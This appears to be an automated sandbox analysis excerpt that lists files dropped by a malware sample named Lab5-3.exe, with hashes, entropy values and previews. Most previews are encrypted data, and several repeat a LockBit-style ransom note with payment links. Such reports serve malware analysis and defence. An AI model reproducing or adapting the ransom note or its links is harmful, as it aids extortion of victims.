                                                                                                          Preview:..a.d...A.h..!..wk5.E.6..ID.{..G......dj..!....}%..^..#..]...._.=.6..%..d...]1....M.|....;.. ..AN2=..@Xp|.K.?...q.U.59..O.......W.B..I<%[L...s|..1>!@..S..J3...a.9?09. ...'...9x.....b...~ D\..Q...E.z.u@..I...Mj.e].Y..l.).E........a)j<.y...&.\o-9...Y.0...*.I..4.6<svNu2...mDl.Q.3.Y..q.[i1..EW.m......(..y...P.>+....[O.C.;...U....`.......oN#Z..y.......Fk..4.9..}.L,....{..xz.@..K.x=.(R..Q.;.Tl}.a.ISZ../J...'...Fd}.?Y.B. ...7...i....pT..c..4.7gD.......\...&.....NF".......:B..vX.U.......jD.(.\.?..I a^..d.O.Y....:v..+..[..QJ..^.J]s...T.....P.........6...}#....z....ON.T....G..+6...mF..'.8bZ.....<u^....x..L...M.r14..f.....'......+e.. 6Az.8ZP......:.Cf...:.5..*B ...C._).8].`]..>U.|/K........q...6OA.2................e.d..h;..h......X0..t.,..../..U;P..]...G.FS.[>)..s..@..MlI....;jn.ourP&"....p.*|0.&.....8.$....$..N..Z..$.Po.*.....sBXy..,.J*.u..]UyI.{..0..y.f.uQ.{.g.[.:...M..:=....Bn0jq.?....M....]...0V.E...]\....;x.?...,.7.(.Pb..R..S..!....f..!4.#.y
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1281
                                                                                                          Entropy (8bit):5.0109143188305945
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:24:hXtdFjtPuy1DK6vh88waN7LnNvhv6M9wDKvDtrCAuVcHdBUi:hXltG76vDnNvs0LMAuyH1
                                                                                                          MD5:AD01B46BC788640E0B348FFCEAD87439
                                                                                                          SHA1:0663F726C339E9C5D0EEC46D274C7C2456843C01
                                                                                                          SHA-256:234AAED071BF79A99676C06B51F1D98432AD7C143C604EDC16664490EBF22E96
                                                                                                          SHA-512:B49EC5246753A9F857278235BEEA0A84667AF5DBCC8FA1295807F6D9248E0920EE45584DDDED739036C965C055AF2A67A8E435E502CF9C5115E0F913EA897F09
                                                                                                          Malicious:false
                                                                                                          Preview:All your important files are encrypted!..Any attempts to restore your files with the thrid-party software will be fatal for your files!..RESTORE YOU DATA POSIBLE ONLY BUYING private key from us...There is only one way to get your files back:....1) Through a standard browser(FireFox, Chrome, Edge, Opera)..| 1. Open link http://lockbit-decryptor.top/?BC76D224712A7481BC6E90ACB6D18E50..| 2. Follow the instructions on this page......2) Through a Tor Browser - recommended..| 1. Download Tor browser - https://www.torproject.org/ and install it...| 2. Open link in TOR browser - http://lockbitks2tvnmwk.onion/?BC76D224712A7481BC6E90ACB6D18E50... This link only works in Tor Browser! ..| 3. Follow the instructions on this page...... ### Attention! ###.. # lockbit-decryptor.top may be blocked. We recommend using a Tor browser to access the site.. # Do not rename encrypted files... # Do not try to decrypt using third party software, it may cause permanent data loss... # Decryption of your files wit
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1281
                                                                                                          Entropy (8bit):5.0109143188305945
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:24:hXtdFjtPuy1DK6vh88waN7LnNvhv6M9wDKvDtrCAuVcHdBUi:hXltG76vDnNvs0LMAuyH1
                                                                                                          MD5:AD01B46BC788640E0B348FFCEAD87439
                                                                                                          SHA1:0663F726C339E9C5D0EEC46D274C7C2456843C01
                                                                                                          SHA-256:234AAED071BF79A99676C06B51F1D98432AD7C143C604EDC16664490EBF22E96
                                                                                                          SHA-512:B49EC5246753A9F857278235BEEA0A84667AF5DBCC8FA1295807F6D9248E0920EE45584DDDED739036C965C055AF2A67A8E435E502CF9C5115E0F913EA897F09
                                                                                                          Malicious:false
                                                                                                          Preview:All your important files are encrypted!..Any attempts to restore your files with the thrid-party software will be fatal for your files!..RESTORE YOU DATA POSIBLE ONLY BUYING private key from us...There is only one way to get your files back:....1) Through a standard browser(FireFox, Chrome, Edge, Opera)..| 1. Open link http://lockbit-decryptor.top/?BC76D224712A7481BC6E90ACB6D18E50..| 2. Follow the instructions on this page......2) Through a Tor Browser - recommended..| 1. Download Tor browser - https://www.torproject.org/ and install it...| 2. Open link in TOR browser - http://lockbitks2tvnmwk.onion/?BC76D224712A7481BC6E90ACB6D18E50... This link only works in Tor Browser! ..| 3. Follow the instructions on this page...... ### Attention! ###.. # lockbit-decryptor.top may be blocked. We recommend using a Tor browser to access the site.. # Do not rename encrypted files... # Do not try to decrypt using third party software, it may cause permanent data loss... # Decryption of your files wit
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1281
                                                                                                          Entropy (8bit):5.0109143188305945
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:24:hXtdFjtPuy1DK6vh88waN7LnNvhv6M9wDKvDtrCAuVcHdBUi:hXltG76vDnNvs0LMAuyH1
                                                                                                          MD5:AD01B46BC788640E0B348FFCEAD87439
                                                                                                          SHA1:0663F726C339E9C5D0EEC46D274C7C2456843C01
                                                                                                          SHA-256:234AAED071BF79A99676C06B51F1D98432AD7C143C604EDC16664490EBF22E96
                                                                                                          SHA-512:B49EC5246753A9F857278235BEEA0A84667AF5DBCC8FA1295807F6D9248E0920EE45584DDDED739036C965C055AF2A67A8E435E502CF9C5115E0F913EA897F09
                                                                                                          Malicious:false
                                                                                                          Preview:All your important files are encrypted!..Any attempts to restore your files with the thrid-party software will be fatal for your files!..RESTORE YOU DATA POSIBLE ONLY BUYING private key from us...There is only one way to get your files back:....1) Through a standard browser(FireFox, Chrome, Edge, Opera)..| 1. Open link http://lockbit-decryptor.top/?BC76D224712A7481BC6E90ACB6D18E50..| 2. Follow the instructions on this page......2) Through a Tor Browser - recommended..| 1. Download Tor browser - https://www.torproject.org/ and install it...| 2. Open link in TOR browser - http://lockbitks2tvnmwk.onion/?BC76D224712A7481BC6E90ACB6D18E50... This link only works in Tor Browser! ..| 3. Follow the instructions on this page...... ### Attention! ###.. # lockbit-decryptor.top may be blocked. We recommend using a Tor browser to access the site.. # Do not rename encrypted files... # Do not try to decrypt using third party software, it may cause permanent data loss... # Decryption of your files wit
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1281
                                                                                                          Entropy (8bit):5.0109143188305945
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:24:hXtdFjtPuy1DK6vh88waN7LnNvhv6M9wDKvDtrCAuVcHdBUi:hXltG76vDnNvs0LMAuyH1
                                                                                                          MD5:AD01B46BC788640E0B348FFCEAD87439
                                                                                                          SHA1:0663F726C339E9C5D0EEC46D274C7C2456843C01
                                                                                                          SHA-256:234AAED071BF79A99676C06B51F1D98432AD7C143C604EDC16664490EBF22E96
                                                                                                          SHA-512:B49EC5246753A9F857278235BEEA0A84667AF5DBCC8FA1295807F6D9248E0920EE45584DDDED739036C965C055AF2A67A8E435E502CF9C5115E0F913EA897F09
                                                                                                          Malicious:false
                                                                                                          Preview:All your important files are encrypted!..Any attempts to restore your files with the thrid-party software will be fatal for your files!..RESTORE YOU DATA POSIBLE ONLY BUYING private key from us...There is only one way to get your files back:....1) Through a standard browser(FireFox, Chrome, Edge, Opera)..| 1. Open link http://lockbit-decryptor.top/?BC76D224712A7481BC6E90ACB6D18E50..| 2. Follow the instructions on this page......2) Through a Tor Browser - recommended..| 1. Download Tor browser - https://www.torproject.org/ and install it...| 2. Open link in TOR browser - http://lockbitks2tvnmwk.onion/?BC76D224712A7481BC6E90ACB6D18E50... This link only works in Tor Browser! ..| 3. Follow the instructions on this page...... ### Attention! ###.. # lockbit-decryptor.top may be blocked. We recommend using a Tor browser to access the site.. # Do not rename encrypted files... # Do not try to decrypt using third party software, it may cause permanent data loss... # Decryption of your files wit
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1281
                                                                                                          Entropy (8bit):5.0109143188305945
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:24:hXtdFjtPuy1DK6vh88waN7LnNvhv6M9wDKvDtrCAuVcHdBUi:hXltG76vDnNvs0LMAuyH1
                                                                                                          MD5:AD01B46BC788640E0B348FFCEAD87439
                                                                                                          SHA1:0663F726C339E9C5D0EEC46D274C7C2456843C01
                                                                                                          SHA-256:234AAED071BF79A99676C06B51F1D98432AD7C143C604EDC16664490EBF22E96
                                                                                                          SHA-512:B49EC5246753A9F857278235BEEA0A84667AF5DBCC8FA1295807F6D9248E0920EE45584DDDED739036C965C055AF2A67A8E435E502CF9C5115E0F913EA897F09
                                                                                                          Malicious:false
                                                                                                          Preview:All your important files are encrypted!..Any attempts to restore your files with the thrid-party software will be fatal for your files!..RESTORE YOU DATA POSIBLE ONLY BUYING private key from us...There is only one way to get your files back:....1) Through a standard browser(FireFox, Chrome, Edge, Opera)..| 1. Open link http://lockbit-decryptor.top/?BC76D224712A7481BC6E90ACB6D18E50..| 2. Follow the instructions on this page......2) Through a Tor Browser - recommended..| 1. Download Tor browser - https://www.torproject.org/ and install it...| 2. Open link in TOR browser - http://lockbitks2tvnmwk.onion/?BC76D224712A7481BC6E90ACB6D18E50... This link only works in Tor Browser! ..| 3. Follow the instructions on this page...... ### Attention! ###.. # lockbit-decryptor.top may be blocked. We recommend using a Tor browser to access the site.. # Do not rename encrypted files... # Do not try to decrypt using third party software, it may cause permanent data loss... # Decryption of your files wit
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):6144
                                                                                                          Entropy (8bit):7.971576681384062
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:96:dk0n+RfbZ5O9rBmJ9GGwsngLIP9txOJc5rReSGx0uKeY2ElUJ:OzGBYZwsbP9tm0eR0Cb
                                                                                                          MD5:FA52868989DE6F3CC8B5E3C381E620B1
                                                                                                          SHA1:148850C8327AE5F8CF068B3621B5F00D915B63DA
                                                                                                          SHA-256:D5670798392DBEF9AC9D6DCCDA2EF8D9C30B3ECC414BBF07F20BB584352F154A
                                                                                                          SHA-512:5C95AF62C6022347E21A751BD19A598301084D30180258A4C224368B60BACB26DA365B417B1414C88B0C06897418A10DB9112C22B9DF2C2DC2A15CD8A6A7CB37
                                                                                                          Malicious:false
                                                                                                          Preview:.).R...r..k..........C..8..i?O...3.Xn.`.v._...]9....=l.LH.S.\$W........8F.]._b...m. ..*f;~.N0t"..tM.H.)....8.U..&.KU.....4.;...gg.....g....)..s...Q.p...K...6_R.P.\.c\.Nx._@...c^t.........82+-.v%...|..+..u...e.`...7..'.....L.m.9a.R.S1.Vz 4..lL$&.....{_.gQ.x......r'9....*..(.c......0..4....\$N..[.%.J.k6.6#..`.A[...Z..........jAu.l4..'6MO..*n..!Y.V..v9.F.-.+.."*.rqp32.x...h..=....I,e._H%$..=%.W.wb......,....._..~A.n.!...G.....ys&.c..O.g.}...A..n.0s...)...Q.5.. ....}..gE+..S}...{ .A....A....=.8....sD.....E:..../...`.63T.cw...[.x=o.v#._.y.#W<.Jd6.^.~.-S.2U.f.f......#..:X=.{V.Y....M..3.."[2.4....~O...G"?X.9..ou....3N.B.2(...~..M]1]F..V..*...N7....I.1.....!~c...i..%@.......t]....*...f..@..H1.g:.|...../..~..wv.i.YO...j....E9.7.....4...R5...T...6l.......]o 4.......O.w..+..Il)z.H."S&=8...$.q..:/Q....s.W....~..d].....a......D.1l......YB.y.P..._/p..DA}q0....uc4t.q.buP.==yj+..../C....x..5....Z...K..bihD..4...fLt...Y.5......N.....\~1.{.7.DN..f.."J.
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1281
                                                                                                          Entropy (8bit):5.0109143188305945
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:24:hXtdFjtPuy1DK6vh88waN7LnNvhv6M9wDKvDtrCAuVcHdBUi:hXltG76vDnNvs0LMAuyH1
                                                                                                          MD5:AD01B46BC788640E0B348FFCEAD87439
                                                                                                          SHA1:0663F726C339E9C5D0EEC46D274C7C2456843C01
                                                                                                          SHA-256:234AAED071BF79A99676C06B51F1D98432AD7C143C604EDC16664490EBF22E96
                                                                                                          SHA-512:B49EC5246753A9F857278235BEEA0A84667AF5DBCC8FA1295807F6D9248E0920EE45584DDDED739036C965C055AF2A67A8E435E502CF9C5115E0F913EA897F09
                                                                                                          Malicious:false
                                                                                                          Preview:All your important files are encrypted!..Any attempts to restore your files with the thrid-party software will be fatal for your files!..RESTORE YOU DATA POSIBLE ONLY BUYING private key from us...There is only one way to get your files back:....1) Through a standard browser(FireFox, Chrome, Edge, Opera)..| 1. Open link http://lockbit-decryptor.top/?BC76D224712A7481BC6E90ACB6D18E50..| 2. Follow the instructions on this page......2) Through a Tor Browser - recommended..| 1. Download Tor browser - https://www.torproject.org/ and install it...| 2. Open link in TOR browser - http://lockbitks2tvnmwk.onion/?BC76D224712A7481BC6E90ACB6D18E50... This link only works in Tor Browser! ..| 3. Follow the instructions on this page...... ### Attention! ###.. # lockbit-decryptor.top may be blocked. We recommend using a Tor browser to access the site.. # Do not rename encrypted files... # Do not try to decrypt using third party software, it may cause permanent data loss... # Decryption of your files wit
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1281
                                                                                                          Entropy (8bit):5.0109143188305945
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:24:hXtdFjtPuy1DK6vh88waN7LnNvhv6M9wDKvDtrCAuVcHdBUi:hXltG76vDnNvs0LMAuyH1
                                                                                                          MD5:AD01B46BC788640E0B348FFCEAD87439
                                                                                                          SHA1:0663F726C339E9C5D0EEC46D274C7C2456843C01
                                                                                                          SHA-256:234AAED071BF79A99676C06B51F1D98432AD7C143C604EDC16664490EBF22E96
                                                                                                          SHA-512:B49EC5246753A9F857278235BEEA0A84667AF5DBCC8FA1295807F6D9248E0920EE45584DDDED739036C965C055AF2A67A8E435E502CF9C5115E0F913EA897F09
                                                                                                          Malicious:false
                                                                                                          Preview:All your important files are encrypted!..Any attempts to restore your files with the thrid-party software will be fatal for your files!..RESTORE YOU DATA POSIBLE ONLY BUYING private key from us...There is only one way to get your files back:....1) Through a standard browser(FireFox, Chrome, Edge, Opera)..| 1. Open link http://lockbit-decryptor.top/?BC76D224712A7481BC6E90ACB6D18E50..| 2. Follow the instructions on this page......2) Through a Tor Browser - recommended..| 1. Download Tor browser - https://www.torproject.org/ and install it...| 2. Open link in TOR browser - http://lockbitks2tvnmwk.onion/?BC76D224712A7481BC6E90ACB6D18E50... This link only works in Tor Browser! ..| 3. Follow the instructions on this page...... ### Attention! ###.. # lockbit-decryptor.top may be blocked. We recommend using a Tor browser to access the site.. # Do not rename encrypted files... # Do not try to decrypt using third party software, it may cause permanent data loss... # Decryption of your files wit
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):6096
                                                                                                          Entropy (8bit):7.963140908248014
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:96:jGNAvvi1fXmtDvv6NqcphJTsAB0MIJqAoeDErWHT+aDEsSBWum7zkxttDuGx0uKk:yNAvwfXiDv6NqcpnPBWYAX9HT+vBWlAr
                                                                                                          MD5:ED4C63CC07DB4DE123859DAA44DAE812
                                                                                                          SHA1:16425D83B9F94DCFF61319D6A728AC7F85A3B1A9
                                                                                                          SHA-256:489FE87CE821154F074388082BED3B50D868671198016AF1BDB2C6929BFCBC09
                                                                                                          SHA-512:F7DFC9FCA532099998EBD90212AEEFAFD2BBD09482EE83C0FD65E623E3F29C21EF46D95AB9A0A59471340A945959A7D3E9B7F3972D0D6B5D57109CBFD0656673
                                                                                                          Malicious:false
                                                                                                          Preview:....`X..`*|..%.!.|.o....A..u....3.Bw....b.=...$.>......@...As0..'...3..2.2c.....!.`..`..%D.8...).Bl....6...s.....R.K:./..5..M;g.p..f...|........r;/g.$.r..WS`.fy[X.l_..q...&.f5 P..%K.....fH.....:..[....'h.o.%s.jp..}...*....a.........+..P.|.V.QbK\z+0.AU&...t\S.Jp.%..7.h...,ns_.!....."...U.g...<.....,.d...p......F.s9...[b..>|.[7............Ll.f`.......V7...T....nxK..<.d.@W....}.$.t.*. z..BP..T.z<M..oQ.;.......#w...qm...!.}.Ow....1}...*..%.5.[.c.....'.f,.aj4....{....B.0......:~.U..m.wRO..n.#....2B....U)h..5.`....LK..]i."...N"..cJ.uL.y..=aw...if.Y.7.R.S.....Ry.?*h...z.....s.....W...,fm.-..]+...vh....>V.........q..p...4.J...';F....%xb....m".q....|....4^.S...Y.F.Q.m.......lcQ............dHe|.+)3F.8)...&.{...A.K.y^..D-..!..b=;.\...C^&...X.%.:.B..}|we.*....V...U.....K.M..ddS.{c.0|H..nQ.....qW. .<....q....?.$.>.7.c...R.00..p.})..K..ZB..h.t..C....U...i...@>...E....b.w.....?.E..&|.<...l..G1r{)...:..Bq.b| .*{..`...S...;.H....%.,u..=...HPh.]~...p..
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):5536
                                                                                                          Entropy (8bit):7.9671584662348955
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:96:tV8LYKMkaXq8bN0+VrsuxPJAHAm4ZbpoMKatGx0uKeY2ElUJ:taLFRBWuCrsuxxaH4bir0Cb
                                                                                                          MD5:633A1238758D0CA17D83F7C6782A022C
                                                                                                          SHA1:762A581A18EF4ADC21755E49497831CE9D0DBA1A
                                                                                                          SHA-256:EDB205EB05B581AC2F6EAA09F727F75C9F24E9BECCBA3E7677A90DD9037FC9EF
                                                                                                          SHA-512:96BB432352CDCA2183FCB4D5BAB7FD2DA4A70BF86D939C262281B05109252DD81544C0F3E0176C4B638BE5E0A83FC62A939ADBBCAC4F3663B737E70795D670C2
                                                                                                          Malicious:false
                                                                                                          Preview:]X/......8.f.,..l....Z...(.h<..`.*'.|...Y.R..YJ1.....F......;.VI.;D.....T<..n]#^E.....f..D}........e..8.o......^....{.."m.W.........\.6.D$.xc..f.Y.=...Z..:M..a.l...u}....c.g=..V....)..8.<....)..K..<...6..!...9x.n.....3.Y......H.<.I.<....].,_....R.....?06B.1.... ...........Kp;4.D..,.=..|...&.P.n..g .Xe..F.D:d.....2kU.e....+..B,...A#..lPp...~'...@I.A_...*...=...L.=.....'..}.G....`Fr...fn.....C........6R..o.C..m..r.l.....6....'......>.u4.........'.#..>.K..$2.h.o. ~.SY......-_..d|NF..m...~J..L.T...J3A{G..=..3.sP....T+..u;m.=44.U.H0..us.....T..u..4>.09...D"...{..J..6>U...k.Y".:..8o.z[}.I.#..0xa.$.[.!......F9.Qe....u...P.5....,..JwH...*E...$K.D-..q.6z[..).*..n...........D......<A..<.c..gf.c...@..U.j. .Y...G.-=W..e.......6.u....V.....Y..&CE.9..ehO..r.#..SJ../.[.........D..{;2.u..P.....NE.....4..y..A...x.i..../f.1.Y,S..[.....e.q.&/S..../.....`J.4.xw..%.0.......vn.y....c0+.e^B.?Mo..5R..-)...XR^. ...g........T...3.I..3.d..]....B..$...<....oo
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):6240
                                                                                                          Entropy (8bit):7.97404877530019
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:192:AxjleOtNX6rL2xepa5aVXP2Ihhxdxe0Cb:AL7CppXeKLLetb
                                                                                                          MD5:0E94EF1A14F33B5E30AF2A123D09D917
                                                                                                          SHA1:43564C41E5F749A9DA7C101CE519D47CE1C680E0
                                                                                                          SHA-256:C345EB261223063E89BF42BA4ED4B4A4375C26C4798EB2BBBCFB20A4B6F79690
                                                                                                          SHA-512:F864DD7C3B22D37D8AC963A7C02ACB81D0C88AC2ABB7FC74BBA0927572A5FBF6D420E177911E38E8B8940DF8B776621304F1122B48292C65E0C235BF54C7FBFD
                                                                                                          Malicious:false
                                                                                                          Preview:O.....o.Pj "..C..\...k....X.:k...=......FM....E....<..Ac..,".t.2.jF]J_.....LX...Y.b.8T...0...K'.Q&.$.D7=.7S...........3;6`-52:.......6[......W0/...t...)..W...N....Y.n.+........X.;%....!....NRe./..?.s.....<..y.a.Y../@.I.nK.)...<.z...6]....0p.&C)...Y..[w...n.........B..f.8...}.P.y8...W..R,p.z..1.s6..6..E.7d.T.._..E.r,..I.."..Y.c"......../...D....ZW..,............x.L/l..x.>.+~.V......}y$.(..%Sb$j.2...mXZD..W....4_..$...`.[N....S......'...SK..[y`..rL.._....T...X.l..8..$...J5B.KdJm.z../.{+w.oK!mQ.O.wu1.~H..=..2.. M.e...U.l.......N8L.,.{sk../d.t....BF........L.y.....|.'.tB..xl~eU....zi.....$..Vo..)C..|....a.to..V. `........S,.(..........v..WY.2..(....Z./..5DM.nE.....W..=.+l".h.....3.........$h...uP....}.]5..7......R.......|.D.jRT._..e.=.X..Bm....o...u.`|....'.....a^.]l..f...X.......3...K"..4.I.a...C...anY.d....=..).y....0-..........a^|$.DG..%..$.3A.............).......\j.E........?..1......r...YJK...L...E.{.C....M.\c..P..........n.X..k.x.#..
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):6032
                                                                                                          Entropy (8bit):7.969930518280634
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:96:D3WWpUYjGe+rFiUg5csbHuKDtb0b3p/IYkzz0o6m5b6CEZpXP30VJ6VuXFBkeGxZ:aWZiUz5cs6kgb5guo60pEfX/0VJ6VaUH
                                                                                                          MD5:9ACAF8E887F93A15BC119EA070E43F21
                                                                                                          SHA1:8201957AEF786464CBA86E2CDCB239EFF2D34D83
                                                                                                          SHA-256:59B3F46C0B9D6576B76BE2A9C4EEE6C88AA2B0ED7CEF0D25AC862F7893627F17
                                                                                                          SHA-512:523EC892CC3D26CE091511E19D04AEC8E058F1464C12936A7B70E4B8810A1E02C3EC9253D015D01859669867F51684A776C290317D3EC9FDEDE0B3BDBD341174
                                                                                                          Malicious:false
                                                                                                          Preview:..e([. ..y...F..|..&.K.k....."kd..7I.R.(S..=.90B...}.D...@.i+R.q..Z......p.....I.....^..+N2...........x...7..CW.8....Ot.. .{.Q..:...8s"'._.+.NL...#.&c..v...w.7.\q.o`.b..o.77...3.C^..W..7.|?!...c.ze..~9...9......g.@"..h&..tDxK..`.....8....T.^...nI@..P'_...p..Z........ji/h.|@.NM| .5.#5...7.7....0.s./6.......)O............Y.bg..V[..s.<.o..o.`[.....Z....C.Hx...9t..^...*.q....>3)W#..J....J5.zm..%..]....%..S?..{....T=..fv'..Py.....Y........M^.=<..{.u./........~%.H.......^..g$P..Yk.vBe..Y....!....k(..o|...J.......9.C..o....`....t.*ct.g...g....O.,`.bO.a.@._..7...18.f.y.^y.....hF....j....m...{.)..Z..!.."..>F~t4U..H..#...Ta?.A .(.u.U...M.#q.S?}...kr.F...Bn.9/.E,.c...*.._q.";y..0_#.;.....N.*.....@!.z5...6......k.._0E......1|e.U .a...J...:k.....>!.M&.HM.z...".....$.e.7I.7O..GM....7"..Q.z0...8.J..3C.v.I... .|.H.U..%..>q...V.Y<.SI.."..A....^<......F.I.T...'....S.O..NN!.W..n..A.T.&..q.4.........j../...q..j..].R..9a.)?..C....>.| .C......n....+.s......./..h~...
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):5840
                                                                                                          Entropy (8bit):7.970121994699624
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:96:6VZiXPseepQKIyekHAHUMU5AtwPH9gpiQZiJ8uTSZj6nkDoQGx0uKeY2ElUJ:6yupWag0t5tHe3ZGTSp6kDoj0Cb
                                                                                                          MD5:C2642AEF6914760C4D41E3E3FEF7CAF5
                                                                                                          SHA1:DDCEDF819EF725BFB8106FB6C1565FDA5AD68789
                                                                                                          SHA-256:D35FBB1B5CB7A1B53D34900FE9A0540D42A3E051F1558DD7AE39542EBCB22CCD
                                                                                                          SHA-512:7C2B1128B163027D5423C59694C71503195A6FFEAC3FCCA239D4F434E32395BC9973039EA4FCBC31CF08477613106F60B2FD4562DA2BD65BF2B4D8D87288211A
                                                                                                          Malicious:false
                                                                                                          Preview:6..(2a.Z.w..p.....X*2j6....2,......P.#..C0.....J......?w..l.8.n..........2......G|.1xj.....G.....MD...>'..*/...6Q.....y.D.~..8.%.UE....S...B{..z...V.N..3.....S^...Z.kg........I..F....\.p....^..2wR7...v.^.....;...!Z.VI.`B.G.^.e\.+.4.q.,.ji...(.9\....D.;).<.R.....w.....8.yhLx..|.q..*..V.h....h.S.@|...p......stb.H.d4.....I...yl.H3i.TF..h%rl..:.......b!....<J...#+..l%..d.t.{.......<...#}.F..M$.O..C;N.Y.]o....E.[.Q..}<.X.....@G...?.....`.....F.{..d"I.%.w........\!...a.iR.U...~.....~..\...A?.b.#.].4x....x.A4W....-Z....."wA.v.Y.px.&.%..<..;.j.."5.1..H....~{..c{%.H!.....9P5..q.a..">]T[..%..]orQ....iK..r...].]....y.....)ul.&...H1..nd...hz6.<....,%...H..w........f.J.,k^.f\.J.0.6W.i....;^.$...1...I..?.T.k.if..O.ss.G..,.L. ...p.8T!.4..T'.[=...%...w7(J8l}k.|....g.Os{@t4Iz[.6.N.V../..../..i..y....;...c.....(."_..P~Q...'.nE.N\.....y.s7. .].....B...L...d$3.......,.......?3....c..................@[d.......fr.....VV-...(..?p...>.2.V8m..
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:OpenPGP Public Key
                                                                                                          Category:dropped
                                                                                                          Size (bytes):6160
                                                                                                          Entropy (8bit):7.967268892803205
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:192:gwvMJjPI2/oXzy5dT93zK8jCp3g2ZY0Cb:IJjHoe593zK/w2ZYtb
                                                                                                          MD5:E8529F019D06FA0911AA519CC022FFD5
                                                                                                          SHA1:B4CAA6C8D619131F13B485855283DC443EF52D90
                                                                                                          SHA-256:73A8F4B8AED49D1155972A7EEDE92E525A611BDF574647F5D03450F6C95A22C4
                                                                                                          SHA-512:AC987C68D3A8212D89DAE4E7CA2C3E1335DD931AC22D2933CDB3C22858107809265A3E79FC205E6B4676FC470453B25F55A2FEDE1D060021D44275791E70ACC2
                                                                                                          Malicious:false
                                                                                                          Preview:...........K.V.....?.g.)._.nc5.`..q..{-.L..sa..+.bkM...d2....M.7....$.._Fs.&....{..D^..X.W8:.S.$..hk.r...*.-...W.....LL.!.W$p@...q..J.3...Z<.....:z\.*Y.MC.3..z.....t{..Cn<&M...t./g.T"4s#;T..p.....&<.d....)|J.....B4.......B.p.e...... ..|.TV.....Sv...~...5.=.|^Th#*V.n.:....X[.c.&........i...U.g.G.cGo.v.ZzDE...8/.}.f.....?&#.....w...P..2J...-3........d...G...zo _..=...Q1..'..-....w..Q<........5!.u.%.y..$..1...w......%oWi....gy|s .u...oQiy....|n....M....z-.j)...=.~.O.h9.%.z.b(...}.........5..........V.....a.Zy...X..........e... .<...~.w@.A!.?Y.p..6.A........\x...1.3A....z.....+?.@....!...A"Q._.U._..c6..1$..i....V.L......9.3 s..........%6..."..^.&.'..&&*(.C...6.....yIS.........[..u..@.,....zF1.. W...p....N...........K2_.6...oD....&2..R=>..e.!..X3...X...N>.a!.Y'.}.$..".{...{..|.VZ...z&.fV.n#.q?.h.Z..-{fbsAN.:^~>....);.d.c...f.Q%..i...P..".Ox..g.,*$0....+m...N......O].l...Q1.#i.Y.B.VI|..nA....Kc.....a....P.-L(r.y.C.B.f.M.)....E.*..K^.....
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2768
                                                                                                          Entropy (8bit):7.937584539092192
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:tdjAHuxof+PR2qX6gF+znRB52RBHq2rxKHfUTid3hBaUoSGFcmeykEdEElU92i:tdjAgPR206gF+zR6Zr/Gx0uKeY2ElUJ
                                                                                                          MD5:4F40E5453DF997728E52E90A0CAE373F
                                                                                                          SHA1:E47ECFC7DDF623A94D98B05218B0EC48592E7964
                                                                                                          SHA-256:4FB870B4BF7E95B6256D9DD8BFEA71B0AD4B10368FE146E96D9009B225248950
                                                                                                          SHA-512:7B021F81037DF36D32E6E9E3BBAE44A14A430F3C7DBD884F1F1B415EF88E5C4AD483319C83F82CFA3EA7D5090F59A937501EA832EF15DD29EAD08E062631F761
                                                                                                          Malicious:false
